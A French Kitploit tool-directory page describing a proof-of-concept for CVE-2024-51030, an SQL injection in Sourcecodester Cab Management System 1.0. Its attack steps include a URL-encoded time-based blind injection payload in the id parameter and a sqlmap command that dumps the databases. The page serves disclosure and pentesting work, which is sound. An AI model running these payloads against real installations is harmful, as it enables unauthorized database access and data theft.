Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-51030 — Exploit de preuve de concept pour injection SQL dans Sourcecodester Cab Management System 1.0, démontrant l'exécution SQL arbitraire via le paramètre id dans manage_client.php et view_cab.php. | Kitploit
Outils/GitHubGitHub/vighneshnair7/cve-2024-51030
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubvighneshnair7/cve-2024-51030

CVE-2024-51030

Exploit de preuve de concept pour injection SQL dans Sourcecodester Cab Management System 1.0, démontrant l'exécution SQL arbitraire via le paramètre id dans manage_client.php et view_cab.php.

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-51030

Description

Une vulnérabilité d'injection SQL dans manage_client.php et view_cab.php de Sourcecodester Cab Management System 1.0 permet à des attaquants distants d'exécuter des commandes SQL arbitraires via le paramètre id, conduisant à un accès non autorisé et à une compromission potentielle des données sensibles dans la base de données.

Type de vulnérabilité

Injection SQL

Fournisseur du produit

Sourcecodester

Base de code du produit affecté :

https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

Composant affecté :

Le Sourcecodester Cab Management System v1.0 est vulnérable à une injection SQL via le paramètre id dans les pages manage_client.php & view_cab.php.

Vecteurs d'attaque :

  1. Configurez l'application localement et connectez-vous avec les identifiants admin par défaut fournis, ou vous pouvez également vous connecter avec un utilisateur admin à privilèges réduits comme (staff).
  • Maintenant, naviguez jusqu'à l'URL suivante dans votre navigateur : http://localhost/cms/admin/?page=clients/manage_client&id=1
  • Injecter la charge utile SQL : Modifiez le paramètre id dans l'URL pour inclure une charge utile d'injection SQL aveugle basée sur booléen ou basée sur le temps : - http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
  • Observez la réponse de l'application : La page devrait prendre sensiblement plus de temps (5 secondes) à charger si l'injection réussit, confirmant que le paramètre id est vulnérable à une injection SQL.
  • Utilisez maintenant l'outil SQLMap pour une exploitation plus poussée et le vidage des bases de données avec la commande ci-dessous : sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
  • Référence :

    1. https://owasp.org/www-community/attacks/SQL_Injection
    2. https://portswigger.net/web-security/sql-injection
    Télécharger l’outil